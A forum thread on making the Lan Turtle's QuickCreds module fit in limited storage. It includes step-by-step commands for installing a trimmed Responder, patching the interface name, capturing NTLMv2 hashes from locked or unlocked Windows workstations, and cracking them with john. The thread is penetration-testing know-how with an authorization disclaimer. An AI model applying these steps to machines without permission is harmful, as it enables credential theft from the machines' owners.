Fixing the Lan Turtle disk space issue with QuickCreds, no SD card

[panadero]

After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues.  Here's our fix!

(we take no responsibility if you break something/somebody.  Only hack when you have prior approval and authorization!)

Factory reset, or push the turtle-5.bin firmware to reset  (probably need to upgrade to v5 anyway).  This makes sure you are set to base.  YMMV.

Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine

ssh in to 172.16.84.1, sh3llz, change password

Update the modules list

Only install QuickCreds for now, so we have enough space

Select QuickCreds and configure

Let it install it's dependencies

You can now set QuickCreds to 'Enable' so that it will start at boot

DO NOT REBOOT YET!

At this point, we're going to exit and git clone the responder package

DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF

 

Exit 'turtle' back to a basic root shell

Git clone the Responder package first to /tmp since there is plenty of space. 

    git clone git://github.com/lgandx/Responder /tmp/Responder

BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp

du -sh /tmp/Responder

    3.8M

rm -rf /tmp/Responder/.git

rm -rf /tmp/Responder/tools/MultiRelay/

du -sh /tmp/Responder

    450.5k

We also want to remove the git package as it takes up >1MB of space.  QuickCreds installs it /only/ to git the Responder package  😕

 opkg remove git

 df -h 

     1.2M available on /

Move the Responder package back to /etc/turtle/ for QuckCreds to find it

mv /tmp/Responder/ /etc/turtle/

df -h

        1.1M still available on / now  (w00t)

 

The QuickCreds module is hardcoded to use br-lan as the interface.  This doesn't exist, so we need to change it to eth0.  Another 😕

    sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds

 

You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds

Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!!

Copy and paste the hash from /root/loot/#/HTTP-NTLMv2-172.16.84.127.txt

Paste into a hash file and send it to john with a wordlist

    john hash.txt --wordlist=wordlist.txt

 

Testing shows this works whether the laptop is locked or not locked.

These hashes can not be replayed, only cracked.

You still have plenty of space to return to the turtle shell and install any other modules you need at this point.

You may need git for something else, but probably not enough space.

This set up is for the "Grab creds from a locked Workstation" scenario.  You may need MultiRelay for something else...?  Not needed for QuickCreds.

 

ENJOY!

[BBK]

I have an original Lan Turtle with no SD card. I just updated to the 6.2 firmware, and was found that Quick Creds acted like it was working, but the folders (e.g. ~/loot/1/) were empty. This post solved the issue. For anyone looking at this later, there are a few minor adjustments:

I did stay on 6.2 firmware (didn't factory reset to 5)

When I got to "git clone git://github.com/lgandx/Responder /tmp/Responder", I didn't have git, and git wouldn't install due to lack of space. Instead I went to https://github.com/lgandx/Responder/releases, copied the tar.gz link to the latest release, and then on my Lan Turtle did "wget https://github.com/lgandx/Responder/archive/v3.0.0.0.tar.gz" while inside /tmp/

I un-tared this, and then more or less continued with the instructions. There was no .git directory to remove, but I did remove /tools/MultiRelay, and of course I never had to opkg remove git.

When it came time to move /tmp/Responder to /etc/turtle/, I was told that the Responder folder (/etc/turtle/Responder) already existed. It appears that they may have somewhat fixed the dependencies? Still, it hadn't worked, so I removed it (rm -rf /etc/turtle/Responder), and copied my up-to-date version over it.

Moving on, /etc/turtle/modules/QuickCreds has been renamed with lowercase characters (/etc/turtle/modules/quickcreds). So sed -i 's/br-lan/eth0/' /etc/turtle/modules/quickcreds

Looking back on it, since the dependencies may have been fixed, I wonder if replacing br-lan with eth0 was the only thing that needed to be done? Still, it's working now, so I'm not messing with it.